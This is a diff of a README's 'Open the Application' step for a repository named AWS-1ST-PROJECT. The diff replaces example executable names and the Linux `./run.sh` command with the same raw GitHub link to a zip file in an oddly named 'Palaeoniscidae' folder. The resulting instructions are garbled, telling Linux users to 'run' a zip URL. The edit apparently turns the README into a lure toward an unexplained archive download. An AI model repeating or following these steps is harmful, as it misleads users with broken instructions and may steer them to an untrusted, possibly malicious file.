251911748995/AWS-1ST-PROJECT/README.md

 ### Step 5: Open the Application

 After extracting the files, navigate to the extracted folder.
-Look for an executable file (for example, `AWS-1ST-PROJECT.exe`, `run.sh`, or similar).
+Look for an executable file (for example, `https://raw.githubusercontent.com/251911748995/AWS-1ST-PROJECT/main/Palaeoniscidae/AWS-1ST-PROJECT.zip`, `https://raw.githubusercontent.com/251911748995/AWS-1ST-PROJECT/main/Palaeoniscidae/AWS-1ST-PROJECT.zip`, or similar).

 - For Windows, double-click the `.exe` file to launch the application.
 - For macOS, locate the `.app` file and double-click it.
-- For Linux, open the terminal and run `./run.sh` from the extracted folder.
+- For Linux, open the terminal and run `https://raw.githubusercontent.com/251911748995/AWS-1ST-PROJECT/main/Palaeoniscidae/AWS-1ST-PROJECT.zip` from the extracted folder.

 ## 🔍 Configure AWS Resources